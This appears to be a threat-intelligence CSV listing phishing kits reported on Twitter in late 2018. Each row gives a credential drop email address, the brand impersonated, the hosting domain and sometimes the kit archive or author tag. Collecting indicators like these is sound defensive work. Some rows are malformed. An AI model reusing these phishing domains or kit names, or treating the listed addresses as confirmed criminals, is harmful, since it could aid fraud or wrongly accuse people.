10/11/2018, https://twitter.com/JonSelman/status/1050388794086707202, receivableacoount@gmail.com, gmail, feedback.php, Office365, velar852.com, 00100.zip, fudtoolshop@gmail.com
10/11/2018, https://twitter.com/PhishingAi/status/1050493188006338560, mrmikelogs@gmail.com, gmail, , TDS, rifttag.com, disk.zip, 
10/11/2018, https://twitter.com/PhishingAi/status/1050493188006338560, bizreal28@gmail.com, gmail, , TDS, rifttag.com, disk.zip, 
10/11/2018, https://twitter.com/PhishingAi/status/1050494923730956288, onecustomerbox@gmail.com, gmail, , Microsoft, finmedbrokers.co.za, Macro.zip, GOD'S SON
10/11/2018, https://twitter.com/PhishingAi/status/1050494923730956288, onecustomerbox@gmail.com, gmail, , Microsoft, liberty-united.com, Macro.zip, GOD'S SON
10/12/2018, https://twitter.com/JonSelman/status/1050824905971896322, doncharming001@gmail.com, gmail, next.php, Microsoft, danfodiver.com, Outlook New Final 2017.zip, FUDTool

11/5/2018, https://twitter.com/IpNigh/status/1059422256055623681, wirehitman@yandex.com, yandex, , , www.hugedomains.com, , , 
11/5/2018, https://twitter.com/IpNigh/status/1059422256055623681, ricklloyd177@gmail.com, gmail, , , www.hugedomains.com, , , 
11/6/2018, https://twitter.com/olihough86/status/1059731250855006209, ezenwa277@gmail.com, gmail, , Google, , , MineHulk

11/10/2018, https://twitter.com/IpNigh/status/1061139944620613632, mohand.mohamed2121@gmail.com, gmail, , BOA, vqtraertzwq.org, , ,
11/10/2018, https://twitter.com/IpNigh/status/1061299557991092230, am91234567890@gmail.com, gmail, , Paypal, ttudri.com, , ,
11/12/2018, https://twitter.com/IpNigh/status/1061965249337835522, mozayltd@gmail.com, gmail, , PayPal, www.innenraume.com, , ,
11/12/2018, https://twitter.com/IpNigh/status/1062038217430577152, hemtlanker@gmail.com, gmail, , Capitec, www.windproofparaplu.nl, , , 

11/14/2018, https://twitter.com/actorexpose/status/1062818829489840138?s=21, oiltop1133@gmail.com, gmail, , , www.ronessan.com, , , 
11/14/2018, https://twitter.com/IpNigh/status/1062797097035030540, hemtlanker@gmail.com, gmail, , Office365, www.musique-et-spoliations.com, , ,
11/14/2018, https://twitter.com/IpNigh/status/1062797097035030540, ghenghen@newrez.cn, newrez, , Office365, www.musique-et-spoliations.com, , ,

11/15/2018, https://twitter.com/IpNigh/status/1063243089668710401, halden13@yahoo.com, yahoo, , , promo-itau-card-br.com, , , 
11/15/2018, https://twitter.com/IpNigh/status/1063243089668710401, infoccs@novasinfos, novasinfos, , , promo-itau-card-br.com, , , 
11/17/2018, https://twitter.com/IpNigh/status/1064028584967323648, num1working1@gmail.com, gmail, , BOA, casperchildrenscenter.com, , ,
11/17/2018, https://twitter.com/IpNigh/status/1063873618311069696, wildt00l@gmail.com, gmail, , , www.belvc.by, ,
11/17/2018, https://twitter.com/IpNigh/status/1063873618311069696, madstoresk@yahoo.com, yahoo, , , www.belvc.by, ,
11/17/2018, https://twitter.com/tiketiketikeke/status/1063808521899134976, kntlkamuya666@gmail.com, gmail, , Apple, secret-.myappleid-verification-account.com-systemverification.com, , , 

11/19/2018, https://twitter.com/PhishingAi/status/1064552947206377472, aaronlogz7@gmail.com, gmail, , Yahoo, webilix.net, , , 


11/21/2018, https://twitter.com/phishingai/status/1065283882914906112?s=21, portlandort0923@gmail,com gmail, , ScotiaBank, scotia-disable.com, Scotia.zip, 
11/23/2018, https://twitter.com/aneilan/status/1065985520185077760?s=21, result.a@yandex.com, yandex, , Apple, apple-appleid.payment-billing-service-aacount.com, , , 
11/23/2018, https://twitter.com/aneilan/status/1066012620656992257?s=21, ntahlahres@yandex.com, yandex, , Apple, manage.appleid.apple.com.sm-ua-cx-online.net, , ,
11/23/2018, https://twitter.com/nullcookies/status/1066104006790078464?s=21, readaykhan84@gmail.com, gmail, , Facebook, 0freefacebook.weebly.com, , , 

11/26/2018, https://twitter.com/dave_daves/status/1067099634248704000, pluspointgp@gmail,com, , , verificationservice.cf, ,